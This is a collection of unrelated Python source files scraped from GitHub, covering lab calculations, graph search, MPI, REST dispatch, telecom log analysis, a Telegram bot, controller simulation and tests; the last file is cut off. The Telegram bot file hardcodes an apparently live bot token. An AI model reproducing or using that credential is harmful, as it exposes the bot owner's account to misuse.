+{"seq_id":"20438298481","text":"import numpy as np\nfrom Derivative import errorFunc, printProp\nimport Student\nimport Plots\n\n\na1 = np.array([0.034,0.044,0.054,0.064,0.074], dtype=float)\na2 = np.array([0.027,0.037,0.047,0.057,0.067], dtype=float)\nomega1 = np.array([0.122,0.147,0.180,0.208,0.240], dtype=float)\nomega2 = np.array([0.098,0.137,0.162,0.189,0.221], dtype=float)\n\n\n\ndef show(a, o):\n x = a \n y = o\n da = 5 * 10 ** (-4)\n do = 10 ** (-3)\n err_x = np.array([da] * len(a), dtype=float)\n err_y = np.array([do] * len(o), dtype=float)\n betas = Plots.plotODR(x, y, err_x, err_y)\n Plots.plotPoints(x, y, err_x, err_y)\n # Plots.show(\"Orthogonal Distance Regression with errors\", \"distance: a, m\"\n # , r\"angular velocity: omega, $s^{-1}$\")\n\n return betas\n\n\nbeta1 = show(a1, omega1)\nbeta2 = show(a2, omega2)\n\n#beta = Student.combineErrors([beta1[0], beta2[0]], [beta1[2], beta2[2]], [len(a1), len(a2)])\n\n#print(beta)\n\nf = 40\nm = 204 * (10 ** (-3))\ndm = 1 * (10 ** (-3))\ng = 9.81\n\ndef moment(m, k):\n global g, f\n return m * g / (k * 2 * np.pi * f)\n\n\nerror_m1 = errorFunc(moment, [m, beta1[0]], [dm, beta1[2]])\nerror_m2 = errorFunc(moment, [m, beta2[0]], [dm, beta2[2]])\n\nm1 = moment(m, beta1[0])\nm2 = moment(m, beta2[0])\n\nprint([m1, m2], [error_m1, error_m2])\nprint(Student.combineErrors([m1, m2], [error_m1, error_m2], [1, 1]))","repo_name":"LoolzMe/University","sub_path":"Labs/FirstSemester/Lab5.py","file_name":"Lab5.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73938389608","text":"def is_safe(mat, visited, row, col):\n \"\"\"\n verify that the position is either a 0 or * and that it has not been visited yetl\n \"\"\"\n return (mat[row][col] == 0 or mat[row][col] == \"*\") and ((row, col)) not in visited\n\n\ndef is_valid(row, col):\n \"\"\"\n verify that the position is inbounds the grid\n \"\"\"\n return 0 <= row < rows and 0 <= col < cols\n\n\ndef find_shortest_path(matrix, start):\n \"\"\"\n return the location of the found vertex, number of vertexes visited, 
shortest path to the location\n \"\"\"\n count = 0\n q = [(start, [start])]\n # construct a set to keep track of visited cells\n visited = set()\n while q:\n vertex, path = q.pop(0)\n i, j = vertex[0], vertex[1]\n visited.add((i, j))\n count += 1\n\n if matrix[i][j] == \"*\":\n return (i, j), count, path\n\n if is_valid(i + 1, j) and is_safe(matrix, visited, i + 1, j):\n next_node = (i + 1, j)\n q.append((next_node, path + [next_node]))\n visited.add(next_node)\n\n if is_valid(i - 1, j) and is_safe(matrix, visited, i - 1, j):\n next_node = (i - 1, j)\n q.append((next_node, path + [next_node]))\n visited.add(next_node)\n\n if is_valid(i, j + 1) and is_safe(matrix, visited, i, j + 1):\n next_node = (i, j + 1)\n q.append((next_node, path + [next_node]))\n visited.add(next_node)\n\n if is_valid(i, j - 1) and is_safe(matrix, visited, i, j - 1):\n next_node = (i, j - 1)\n q.append((next_node, path + [next_node]))\n visited.add(next_node)\n\n\nrows = cols = 4\nmat = [[0, 0, 1, 0], [0, 0, 0, 1], [1, 1, 0, 0], [1, 0, \"*\", 1]]\nstart = (0, 0)\n\nprint(find_shortest_path(mat, start))\n","repo_name":"balassit/improved-potato","sub_path":"examples/bfs-grid.py","file_name":"bfs-grid.py","file_ext":"py","file_size_in_byte":1757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42673050348","text":"\"\"\" mpiexec -n 4 python3 task_mpi.py\n\"\"\"\nfrom __future__ import print_function\nimport time\nimport numpy as np\nfrom mpi4py import MPI\nfrom task import worker\n\ncomm = MPI.COMM_WORLD\nrank = comm.Get_rank()\nsize = comm.Get_size()\n\nN = 4000 # Matrix size\nM = None # Original Matrix (created by root proc)\nt1 = None # Start time\njobs = None # Jobs for workers (splitted matrix) in to (almost) equal parts\n\nif rank == 0:\n t1 = time.time()\n M = np.random.randint(10, size=(N, N))\n jobs = np.array_split(M, size, axis=1)\n\njob = comm.scatter(jobs, root=0)\n\nprint(\"%d rank :: received job\" % rank)\nresult = worker(job)\nprint(\"%d rank :: send result\" % rank)\n\nresults = comm.gather(result, root=0)\n\nif rank == 0:\n T = np.stack(np.concatenate(results))\n assert np.allclose(T, M.transpose()), \"Transposed matrix incorrect\"\n print(time.time() - t1)\n","repo_name":"mantydze/lps","sub_path":"transpose/task_mpi.py","file_name":"task_mpi.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13639054525","text":"import inspect\n\nimport cherrypy\nfrom turbogears.controllers import expose, Controller\n\n\nimport logging\nlog = logging.getLogger('turbogears.rest')\n\n\ndef _default(self, *vpath, **kw):\n http_method = cherrypy.request.method\n method = getattr(self, http_method)\n\n # If there is a vpath, we tried to look up a sub-resource or other exposed\n # method and failed\n if vpath:\n raise cherrypy.HTTPError(404, 'Not found')\n elif not callable(method) or not getattr(method, 'exposed', False):\n raise cherrypy.HTTPError(405, '%s not allowed on %s' % (\n http_method, cherrypy.request.browser_url))\n\n return method(**kw)\n\n\ndef RESTContainer(resource_cls_or_name=None):\n \"\"\"Class decorator for implementing REST-style container controllers.\n\n For example, to create a list of candidate resources such that::\n\n /candidates/\n\n returns a candidate resource for the specified candidate, define the\n candidates controller as\n\n >>> @RESTContainer('CandidateResource')\n ... class CandidateRootController(Controller):\n ... 
pass\n\n >>> class CandidateResource(RESTResource):\n ... \"Represents a single candidate\"\n\n The resource class must have a constructor that takes a single integer ID\n as its first parameter and a reference to the parent container as the\n second parameter.\n\n RESTContainers also do method-based dispatch if the decorated controller\n class does *not* define default::\n\n >>> @RESTContainer(CandidateResource)\n ... class CandidateRootController(Controller):\n ... @expose()\n ... def GET(self):\n ... # handle request for /candidates\n\n For most resource containers, it is assumed that the resource class uses\n integer identifiers, and the int() function is used to determine that a\n resource is being requested: non-integer attribute requests are assumed to\n be requests for attributes on the container itself.\n\n If the resource class defines a valid_id static function, it is used in\n preference to the int function to determine if an attribute request should\n return an instance of the container's resource class. The valid_id function\n should take a single argument and return it if it is a valid identifier or\n raise ValueError if it is not.\n\n \"\"\"\n\n def decorator(controller_cls):\n def resolve_resource(obj):\n try:\n _cls = obj.resource_cls\n except AttributeError:\n try:\n module = inspect.getmodule(type(obj))\n _cls = obj.resource_cls = getattr(module,\n resource_cls_or_name)\n except (TypeError, AttributeError):\n _cls = obj.resource_cls = resource_cls_or_name\n\n return _cls\n\n def _cp_dispatch(self, vpath):\n log.debug('%s vpath: %s', type(self).__name__, vpath)\n\n try:\n resource_id = vpath[0]\n resource_cls = resolve_resource(self)\n id_validator = getattr(resource_cls, 'valid_id', str)\n return resource_cls(id_validator(resource_id), self)\n except ValueError as e:\n log.debug('Invalid resource id: %s (%s: %s)',\n resource_id,\n type(e).__name__,\n e)\n return vpath\n\n controller_cls._cp_dispatch = _cp_dispatch\n\n if not hasattr(controller_cls, 'default'):\n controller_cls.default = expose()(_default)\n\n return controller_cls\n\n return decorator\n\n\nclass RESTResource(Controller):\n \"\"\"Controller base class that provides HTTP method-based dispatch.\n\n Subclasses should define methods for each HTTP method they wish to\n implement (e.g. 
``GET``).\n\n See ``README.rst`` and ``controllers.py`` in the example application for\n example usages.\n\n \"\"\"\n\n default = expose()(_default)\n","repo_name":"drocco007/TurboRest","sub_path":"turborest/turbogears/rest/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72906158248","text":"#!/usr/bin/python\n# Filename: rrc_config_analyzer.py\n\"\"\"\nrrc_config_analyzer.py\nA KPI analyzer to reveal RRC config information\n\nAuthor: Zhehui Zhang\n\"\"\"\n\n__all__ = [\"RrcConfigAnalyzer\"]\n\ntry:\n import xml.etree.cElementTree as ET\nexcept ImportError:\n import xml.etree.ElementTree as ET\nfrom .kpi_analyzer import KpiAnalyzer\n\n\nclass RrcConfigAnalyzer(KpiAnalyzer):\n \"\"\"\n A KPI analyzer to monitor and manage RRC connection success rate\n \"\"\"\n\n def __init__(self):\n KpiAnalyzer.__init__(self)\n\n self.current_kpi = {'SR_CONFIG_IDX': 0.00}\n\n for kpi in self.current_kpi:\n self.register_kpi(\"Configuration\",kpi,self.__rrc_config_callback)\n\n # add callback function\n self.add_source_callback(self.__rrc_config_callback)\n\n def set_source(self,source):\n \"\"\"\n Set the trace source. Enable the LTE RRC messages.\n\n :param source: the trace source.\n :type source: trace collector\n \"\"\"\n KpiAnalyzer.set_source(self,source)\n #enable LTE RRC log\n source.enable_log(\"LTE_RRC_OTA_Packet\")\n\n def __rrc_config_callback(self, msg):\n # deal with RRC OTA\n if msg.type_id == \"LTE_RRC_OTA_Packet\":\n log_item = msg.data.decode()\n log_item_dict = dict(log_item)\n if 'Msg' in log_item_dict:\n log_xml = ET.XML(log_item_dict['Msg'])\n for field in log_xml.iter('field'):\n if field.get('name') == 'lte-rrc.sr_ConfigIndex':\n sr_configidx = int(field.get('show'))\n if sr_configidx < 5:\n sr_period = 5\n elif 4 < sr_configidx < 15:\n sr_period = 10\n elif 14 < sr_configidx < 35:\n sr_period = 20\n elif 34 < sr_configidx < 75:\n sr_period = 40\n elif 74 < sr_configidx < 155:\n sr_period = 80\n elif 154 < sr_configidx < 157:\n sr_period = 2\n elif sr_configidx == 157:\n sr_period = 1\n else:\n self.log_warning(\"Unknown sr_ConfigIndex: \" + str(sr_configidx))\n continue\n self.log_info(\"SR period: \" + str(sr_period) + ' ms, SR ConfigIdx: ' + str(sr_configidx))\n bcast_dict = {}\n bcast_dict['period'] = str(sr_period)\n bcast_dict['config idx'] = str(sr_configidx)\n bcast_dict['timestamp'] = str(msg.timestamp)\n self.broadcast_info('SR_CONFIGIDX', bcast_dict)\n self.store_kpi('KPI_CONFIGURATION_SR_CONFIG_IDX', str(sr_period), msg.timestamp)\n return 0\n\n\n\n\n\n","repo_name":"mobile-insight/mobileinsight-core","sub_path":"mobile_insight/analyzer/kpi/rrc_config_analyzer.py","file_name":"rrc_config_analyzer.py","file_ext":"py","file_size_in_byte":2950,"program_lang":"python","lang":"en","doc_type":"code","stars":92,"dataset":"github-code","pt":"53"} +{"seq_id":"16046946213","text":"import logging\n\nfrom aiogram import Bot, Dispatcher, executor, types\n\nfrom keyboards import *\nfrom films import FILMS\n\nTOKEN=\"5975710242:AAEouA2SuCBQ08a4_PkTSTTUaVK90YVfLKc\"\n\nlogging.basicConfig(level=logging.INFO)\n\nbot = Bot(token=TOKEN)\ndp = Dispatcher(bot)\n\n\n@dp.message_handler(commands='start')\nasync def start(message: types.Message):\n await message.answer(text='Hi! I am a movie listings bot. Pick the film you want to learn about.', reply_markup=film_choice)\n\n\n@dp.callback_query_handler()\nasync def get_film_info(callback_query: types.CallbackQuery):\n # the three original branches were identical, so one membership check covers all films\n if callback_query.data in ('Джон Уік 4 (16+)', 'Підземелля і дракони', 'Екзорцист Ватикану'):\n await bot.send_photo(callback_query.message.chat.id, FILMS[callback_query.data][\"photo\"])\n url= FILMS[callback_query.data][\"site_url\"]\n film_rating = FILMS[callback_query.data][\"rating\"]\n film_description = FILMS[callback_query.data][\"description\"]\n message = f\"Film url: {url}\\nAbout: {film_description}\\n\\nRate: {film_rating}\"\n await bot.send_message(callback_query.message.chat.id, message, parse_mode='html')\n\n# @dp.message_handler()\n# async def echo(message: types.Message):\n# user_info = {\n# \"name\": message.from_user.first_name,\n# \"surname\": message.from_user.last_name,\n# \"username\": message.from_user.username,\n# \"user_id\": message.from_user.id\n# }\n# await message.answer(f'First name: {user_info[\"name\"]}\\nLast name: {user_info[\"surname\"]}\\nUsername: {user_info[\"username\"]}\\nUser id: {user_info[\"user_id\"]}')\n# await message.answer(message.text)\n\n\n\nif __name__ == '__main__':\n executor.start_polling(dp)","repo_name":"Misha304/python-","sub_path":"bot/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":2799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21316804057","text":"# Given a binary tree, we install cameras on the nodes of the tree.\r\n# Each camera on a node can monitor its parent, itself, and its immediate children.\r\n# Compute the minimum number of cameras required to monitor all nodes of the tree.\r\nfrom math import inf\r\nfrom typing import Optional\r\n\r\n\r\nclass TreeNode:\r\n def __init__(self, val=0, left=None, right=None):\r\n self.val = val\r\n self.left = left\r\n self.right = right\r\nclass Solution:\r\n def minCameraCover(self, root: Optional[TreeNode]) -> int:\r\n def dfs(root:TreeNode):\r\n if root is None:\r\n return inf,0,0\r\n l_choose,l_by_fa,l_by_son = dfs(root.left)\r\n r_choose,r_by_fa,r_by_son = dfs(root.right)\r\n choose = min(l_choose,l_by_fa,l_by_son) + min(r_choose,r_by_fa,r_by_son) + 1\r\n by_fa = min(l_choose,l_by_son) + min(r_choose,r_by_son)\r\n by_son = min(l_choose+r_by_son,l_by_son+r_choose,l_choose+r_choose)\r\n return choose,by_fa,by_son\r\n\r\n choose, _, by_son = dfs(root)\r\n return min(choose, by_son)\r\n","repo_name":"Ww0225/pythonTest","sub_path":"监控二叉树.py","file_name":"监控二叉树.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26165690461","text":"import logging\nfrom multiprocessing import 
Queue, Event\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport datetime\nimport time\nimport scipy.signal as sg\nfrom bang_bang_controller import BangBangController\nfrom sensor_message_item import SensorMessageItem\n\n# An example of using logging.basicConfig rather than logging.fileHandler()\nlogging.basicConfig(level=logging.DEBUG,\n format=\"%(asctime)s - %(name)s - %(levelname)s - %(message)s\")\n\nlogger = logging.getLogger(__name__)\n\n\ndef sine_wave(x, min_max_range, frequency):\n min_val, max_val = min_max_range\n amplitude = (max_val - min_val) / 2\n\n # Convert frequency from milliseconds to seconds\n frequency_sec = frequency / 1000.0\n\n # Generate the sine wave\n y = amplitude * np.sin(2 * np.pi * (x / frequency_sec)) + amplitude + min_val\n\n return y\n\n\ndef triangle_wave_sg(x, min_max_range, frequency):\n min_val, max_val = min_max_range\n amplitude = (max_val - min_val)\n y = amplitude * sg.sawtooth(frequency * 2 * np.pi * x, width=0.5)\n return y\n\n\ndef triangle_wave(x, min_max_range, frequency):\n min_val, max_val = min_max_range\n amplitude = (max_val - min_val)\n min_val = min_val - amplitude\n\n # Convert frequency from milliseconds to seconds for compatibility with numpy\n frequency_sec = frequency / 1000.0\n\n # Generate the triangle wave\n y = amplitude * np.abs(2 * (x / frequency_sec - np.floor(0.5 + x / frequency_sec))) + amplitude + min_val\n\n return y\n\n\ndef plot_temperature(x_values, y_values, title):\n # Convert current time in milliseconds to a datetime object\n current_time = int(time.time() * 1000)\n current_datetime = datetime.datetime.fromtimestamp(current_time / 1000)\n\n # Create future datetime objects by adding x values (milliseconds) to current time\n x_datetimes = [current_datetime + datetime.timedelta(milliseconds=int(x)) for x in x_values]\n\n # Plotting\n plt.figure(figsize=(10, 6))\n plt.plot(x_datetimes, y_values, label='Temperature')\n plt.xlabel('Time')\n plt.ylabel('Temperature')\n plt.title(title)\n plt.xticks(rotation=45)\n plt.tight_layout()\n plt.legend()\n plt.show()\n\n\ndef main():\n # simulate 2 hours of data at 30 second intervals\n\n # Example usage\n time_range = 2 * 60 * 60 * 1000 # 2 hours\n interval = 30 * 1000 # every 30 seconds\n n_values = int(time_range / interval)\n\n x_values = np.linspace(0, time_range, n_values) # x values in milliseconds\n min_max_range = (20, 30) # Simulated temperature range\n\n # how often does the temperature go through a complete cycle from 20 to 30\n frequency = 120000 # Frequency in milliseconds (2 minutes)\n\n temperature_values = triangle_wave(x_values, min_max_range, frequency)\n\n plot_temperature(x_values, temperature_values, 'Simulated Temperature Over Time')\n\n sensor_message_items: list[SensorMessageItem] = list()\n\n for i, sensor_value in enumerate(temperature_values):\n timestamp = x_values[i]\n sensor_message_item = SensorMessageItem(303721692, 248, float(sensor_value), int(timestamp))\n sensor_message_items.append(sensor_message_item)\n\n message_queue = Queue()\n sig_event = Event()\n bang_bang_controller = BangBangController(message_queue, sig_event)\n bang_bang_controller.start()\n\n # now do the simulation\n for sensor_message_item in sensor_message_items:\n print(\"Injecting sensor message:{}\".format(sensor_message_item))\n message_queue.put(sensor_message_item)\n time.sleep(0.5)\n\n\nif __name__ == \"__main__\":\n 
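# build the simulated temperature trace, plot it, and stream each sample
 # into the BangBangController through the multiprocessing queue
 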
main()\n","repo_name":"ElDuderino/BangBangController","sub_path":"test_bang_bang_controller.py","file_name":"test_bang_bang_controller.py","file_ext":"py","file_size_in_byte":3576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13729578469","text":"\nimport pytest\nfrom lkmltools.google_auth_helper import GoogleAuthHelper\nimport os\nimport json\n\n@pytest.fixture(scope=\"module\")\ndef get_raw_json():\n raw_json = {\n \"type\": \"service_account\",\n \"project_id\": \"someproject\",\n \"private_key_id\": \"xxx\",\n \"private_key\": \"-----BEGIN PRIVATE KEY-----\\nxxx-----END PRIVATE KEY-----\\n\",\n \"client_email\": \"someuser@appspot.gserviceaccount.com\",\n \"client_id\": \"1234567890\",\n \"auth_uri\": \"https://accounts.google.com/o/oauth2/auth\",\n \"token_uri\": \"https://oauth2.googleapis.com/token\",\n \"auth_provider_x509_cert_url\": \"https://www.googleapis.com/oauth2/v1/certs\",\n \"client_x509_cert_url\": \"https://www.googleapis.com/robot/v1/metadata/x509/someuser%40appspot.gserviceaccount.com\"\n }\n return raw_json\n\n@pytest.fixture(scope=\"module\")\ndef get_encoded_json():\n # this is the encoded version of the raw_json above, so doesn't contain any proper secrets. \n # The unit tests below confirm that decoding this byte string below matches the JSON above\n return b'eyd0eXBlJzogJ3NlcnZpY2VfYWNjb3VudCcsICdwcm9qZWN0X2lkJzogJ3NvbWVwcm9qZWN0JywgJ3ByaXZhdGVfa2V5X2lkJzogJ3h4eCcsICdwcml2YXRlX2tleSc6ICctLS0tLUJFR0lOIFBSSVZBVEUgS0VZLS0tLS1cbnh4eC0tLS0tRU5EIFBSSVZBVEUgS0VZLS0tLS1cbicsICdjbGllbnRfZW1haWwnOiAnc29tZXVzZXJAYXBwc3BvdC5nc2VydmljZWFjY291bnQuY29tJywgJ2NsaWVudF9pZCc6ICcxMjM0NTY3ODkwJywgJ2F1dGhfdXJpJzogJ2h0dHBzOi8vYWNjb3VudHMuZ29vZ2xlLmNvbS9vL29hdXRoMi9hdXRoJywgJ3Rva2VuX3VyaSc6ICdodHRwczovL29hdXRoMi5nb29nbGVhcGlzLmNvbS90b2tlbicsICdhdXRoX3Byb3ZpZGVyX3g1MDlfY2VydF91cmwnOiAnaHR0cHM6Ly93d3cuZ29vZ2xlYXBpcy5jb20vb2F1dGgyL3YxL2NlcnRzJywgJ2NsaWVudF94NTA5X2NlcnRfdXJsJzogJ2h0dHBzOi8vd3d3Lmdvb2dsZWFwaXMuY29tL3JvYm90L3YxL21ldGFkYXRhL3g1MDkvc29tZXVzZXIlNDBhcHBzcG90LmdzZXJ2aWNlYWNjb3VudC5jb20nfQ=='\n\ndef test_encode_service_account():\n helper = GoogleAuthHelper()\n encoded_json = helper.encode_service_account(get_raw_json())\n assert encoded_json == get_encoded_json()\n \ndef test_decode_service_account():\n helper = GoogleAuthHelper()\n decoded_json = helper.decode_service_account(get_encoded_json())\n assert decoded_json == get_raw_json()\n\ndef test_write_decoded_sa_json_to_file():\n helper = GoogleAuthHelper()\n filename = \"tmp_test_decoded.json\"\n\n if os.path.exists(filename):\n os.remove(filename)\n\n helper.write_decoded_sa_json_to_file(get_encoded_json(), filename=filename)\n\n assert os.path.exists(filename)\n\n with open(filename, 'r') as f:\n data = json.load(f)\n\n assert data == get_raw_json()\n\n if os.path.exists(filename):\n os.remove(filename)\n","repo_name":"ww-tech/lookml-tools","sub_path":"test/test_google_auth_helper.py","file_name":"test_google_auth_helper.py","file_ext":"py","file_size_in_byte":2623,"program_lang":"python","lang":"en","doc_type":"code","stars":82,"dataset":"github-code","pt":"53"} +{"seq_id":"69873842410","text":"import re\n\nfrom typing import Tuple, List\nfrom .utils import get_mapped_commands\nfrom .errors import TranslationMissing\nfrom .command import Command, cmd_from_info\n\n\nclass Threepio(object):\n \"\"\"\n Threepio Class to translate a command from one framework to another.\n\n :param from_lang: Framework to convert from\n :type from_lang: str\n :param to_lang: 
Framework to convert to\n :type to_lang: str\n :param framework: Reference to package that represents to_lang\n :type framework: object\n \"\"\"\n\n def __init__(self, from_lang: str, to_lang: str, framework: object):\n \"\"\"Initialize a Threepio object to translate commands.\"\"\"\n\n # Fetch a dictionary of mapped commands between frameworks\n self.commands = get_mapped_commands()\n # Assert framework to convert from is present in mapped commands\n assert from_lang in self.commands, f\"\\\"{from_lang}\\\" is not in the mapped commands.\"\n self.from_lang = from_lang\n self.to_lang = to_lang\n self.framework = framework\n\n def _normalize_func_name(self, name: str) -> str:\n \"\"\"Normalizes a function name to lower case and keep only alphabets\n\n :param name: function name to normalize\n :type name: str\n\n :return: returns a string converted to lowercase keeping only alphabets\n :rtype: str\n \"\"\"\n alpha = re.compile(\"[^a-zA-Z]\")\n return alpha.sub(\"\", name).lower()\n\n def _order_args(\n self, cmd: Command, from_info: dict, to_info: dict\n ) -> Tuple[list, dict]:\n \"\"\"Extracts and orders the args and kwargs according to translated command\n\n :param cmd: command to be translated\n :type cmd: Command\n :param from_info: Dictionary of info for the command for the `from` framework\n :type from_info: dict\n :param to_info: Dictionary of info for the command for the `to` framework\n :type to_info: dict\n\n :return: Returns ordered - args and kwargs\n :rtype: Tuple[list, dict]\n \"\"\"\n new_args = []\n new_kwargs = {}\n\n def get_to_arg_index(from_arg):\n \"\"\"Returns index for the original argument in the translated command arguments list\n\n :param from_arg: info of ith argument of 'from' framework\n :type from_arg: dict\n\n :return: returns the index of original argument or None\n :rtype: int or None\n \"\"\"\n return next(\n (\n index\n for index, d in enumerate(to_info[\"args\"])\n if d[\"name\"] == from_arg.get(self.to_lang, None)\n ),\n None,\n )\n\n # Loop through the command arguments For eg. 
Tensors to perform operation to\n for i, arg in enumerate(cmd.args):\n # Extract the info of ith argument of `from` framework\n from_arg = from_info[\"args\"][i]\n # Check if the same name argument is present in `to` framework\n # If yes, get its index\n to_arg_index = get_to_arg_index(from_arg)\n\n # Append arguments which don't have same name between frameworks\n if to_arg_index is None:\n new_args.append(arg)\n continue\n\n # Append arguments with same names at the proper position of the `to` framework\n new_args.insert(to_arg_index, arg)\n\n # Add static args, if any\n for from_arg in from_info[\"args\"]:\n if \"value\" in from_arg:\n to_arg_index = get_to_arg_index(from_arg)\n if to_arg_index is not None:\n new_args.insert(to_arg_index, from_arg[\"value\"])\n\n # If any kwargs are normal args, splice them in as well\n for k, v in cmd.kwargs.items():\n # Map kwargs similarly if provided\n from_arg = [a for a in from_info[\"args\"] if a[\"name\"] == k][0]\n to_arg_index = next(\n (\n index\n for index, d in enumerate(to_info[\"args\"])\n if d[\"name\"] == from_arg.get(self.to_lang, {})\n ),\n None,\n )\n\n if to_arg_index is None:\n new_kwargs[k] = v\n continue\n\n new_args.insert(to_arg_index, v)\n\n return new_args, new_kwargs\n\n def translate_multi(self, orig_cmd, commands_info):\n \"\"\"Translates command which has multiple translated chained commands\n\n :param orig_cmd: command to be translated\n :type orig_cmd: Command\n :param commands_info: chained commmands with info\n :type commands_info: list\n\n :return: Returns translated commands\n :rtype: list\n \"\"\"\n cmd_config = commands_info.pop(0)\n store = {}\n for i, arg in enumerate(orig_cmd.args):\n # Store the command arguments\n cmd_config[\"args\"][i][\"value\"] = arg\n store[cmd_config[\"args\"][i][\"name\"]] = arg\n\n new_cmds = [cmd_config]\n for from_info in commands_info:\n # Creates a command given info and arguments with values\n cmd = cmd_from_info(from_info, store)\n\n # Get the info of the command for the framework we want to convert to with the new alias of the command\n to_info = self.commands[self.to_lang][\n self._normalize_func_name(from_info.get(self.to_lang))\n ][0]\n\n new_cmds.append(self.translate_command(cmd, from_info, to_info))\n return new_cmds\n\n def translate_command(self, cmd, from_command, to_command):\n \"\"\"Translates a Command Object after knowing it exists in both frameworks\n\n :param cmd: command to be translated\n :type cmd: Command\n :param from_command: Dictionary of info for the command for the `from` framework\n :type from_command: dict\n :param to_command: Dictionary of info for the command for the `to` framework\n :type to_command: dict\n\n :return: returns a list of translated commands\n :rtype: list\n \"\"\"\n\n translated_cmd = None\n # Extracts and orders the args and kwargs according to translated command\n args, kwargs = self._order_args(cmd, from_command, to_command)\n output = from_command.get(\"placeholder_output\", None)\n # Return a new Command object created after translation with ordered args and kwargs\n return Command(\n to_command[\"name\"],\n args,\n kwargs,\n attrs=to_command[\"attrs\"],\n placeholder_output=output,\n exec_fn=translated_cmd,\n )\n\n def translate(self, cmd: Command) -> List[Command]:\n \"\"\"Translates a Command Object\n\n :param cmd: command to be translated\n :type cmd: Command\n\n :return: returns a list of translated command/s\n :rtype: list\n \"\"\"\n\n # Normalize the function name\n normalized_func_name = 
self._normalize_func_name(cmd.function_name)\n # Get the info of the command from the framework to be translated from\n from_info = self.commands[self.from_lang].get(normalized_func_name)\n # Throw Exception if the command does not exist in the framework to be translated from\n if from_info is None:\n raise TranslationMissing(cmd.function_name)\n # Check if translated command has multiple chained commands\n if len(from_info) > 1:\n return self.translate_multi(cmd, from_info)\n\n # Extract the info since there is only one command\n from_info = from_info[0]\n\n # Check if the alias of the command exists in the framework to translate to\n if from_info.get(self.to_lang, None) is None:\n raise TranslationMissing(cmd.function_name)\n\n # Get the info of the command for the framework we want to convert to with the new alias of the command\n to_info = self.commands[self.to_lang][\n self._normalize_func_name(from_info.get(self.to_lang))\n ]\n\n return [self.translate_command(cmd, from_info, to_info[0])]\n","repo_name":"OpenMined/Threepio","sub_path":"pythreepio/pythreepio/threepio.py","file_name":"threepio.py","file_ext":"py","file_size_in_byte":8121,"program_lang":"python","lang":"en","doc_type":"code","stars":57,"dataset":"github-code","pt":"53"} +{"seq_id":"9345284550","text":"import unittest\n\nimport numpy as np\n\nimport openmdao.api as om\nfrom openmdao.utils.assert_utils import assert_near_equal\nfrom openmdao.utils.testing_utils import use_tempdirs, require_pyoptsparse\n\nimport dymos as dm\nfrom dymos.examples.cart_pole.cartpole_dynamics import CartPoleDynamics\n\n\n@use_tempdirs\nclass TestCartPoleOptimization(unittest.TestCase):\n @require_pyoptsparse(optimizer=\"SNOPT\")\n def test_optimization(self):\n\n p = om.Problem()\n\n # --- instantiate trajectory and phase, setup transcription ---\n traj = dm.Trajectory()\n p.model.add_subsystem(\"traj\", traj)\n phase = dm.Phase(\n transcription=dm.GaussLobatto(num_segments=40, order=3, compressed=True, solve_segments=False),\n ode_class=CartPoleDynamics,\n )\n # NOTE: set solve_segments=True to do solver-based shooting\n traj.add_phase(\"phase\", phase)\n\n # --- set state and control variables ---\n phase.set_time_options(fix_initial=True, fix_duration=True, duration_val=2.0, units=\"s\")\n # declare state variables. You can also set lower/upper bounds and scalings here.\n phase.add_state(\"x\", fix_initial=True, lower=-2, upper=2, rate_source=\"x_dot\", shape=(1,), ref=1, defect_ref=1, units=\"m\")\n phase.add_state(\"x_dot\", fix_initial=True, rate_source=\"x_dotdot\", shape=(1,), ref=1, defect_ref=1, units=\"m/s\")\n phase.add_state(\"theta\", fix_initial=True, rate_source=\"theta_dot\", shape=(1,), ref=1, defect_ref=1, units=\"rad\")\n phase.add_state(\"theta_dot\", fix_initial=True, rate_source=\"theta_dotdot\", shape=(1,), ref=1, defect_ref=1, units=\"rad/s\")\n phase.add_state(\n \"energy\", fix_initial=True, rate_source=\"e_dot\", shape=(1,), ref=1, defect_ref=1, units=\"N**2*s\"\n ) # integration of force**2. 
This does not have the energy unit, but I call it \"energy\" anyway.\n\n # declare control inputs\n phase.add_control(\"f\", fix_initial=False, rate_continuity=False, lower=-20, upper=20, shape=(1,), ref=0.01, units=\"N\")\n\n # add cart-pole parameters (set static_target=True because these params are not time-dependent)\n phase.add_parameter(\"m_cart\", val=1.0, units=\"kg\", static_target=True)\n phase.add_parameter(\"m_pole\", val=0.3, units=\"kg\", static_target=True)\n phase.add_parameter(\"l_pole\", val=0.5, units=\"m\", static_target=True)\n\n # --- set terminal constraint ---\n # alternatively, you can impose those by setting `fix_final=True` in phase.add_state()\n phase.add_boundary_constraint(\"x\", loc=\"final\", equals=1, ref=1.0, units=\"m\") # final horizontal displacement\n phase.add_boundary_constraint(\"theta\", loc=\"final\", equals=np.pi, ref=1.0, units=\"rad\") # final pole angle\n phase.add_boundary_constraint(\"x_dot\", loc=\"final\", equals=0, ref=1.0, units=\"m/s\") # 0 velocity at the end\n phase.add_boundary_constraint(\"theta_dot\", loc=\"final\", equals=0, ref=1.0, units=\"rad/s\") # 0 angular velocity at the end\n phase.add_boundary_constraint(\"f\", loc=\"final\", equals=0, ref=1.0, units=\"N\") # 0 force at the end\n\n # --- set objective function ---\n # we minimize the integral of force**2.\n phase.add_objective(\"energy\", loc=\"final\", ref=1.0)\n\n # --- configure optimizer ---\n p.driver = om.pyOptSparseDriver()\n p.driver.options[\"optimizer\"] = \"IPOPT\"\n # IPOPT options\n p.driver.opt_settings['mu_init'] = 1e-1\n p.driver.opt_settings['max_iter'] = 600\n p.driver.opt_settings['constr_viol_tol'] = 1e-6\n p.driver.opt_settings['compl_inf_tol'] = 1e-6\n p.driver.opt_settings['tol'] = 1e-5\n 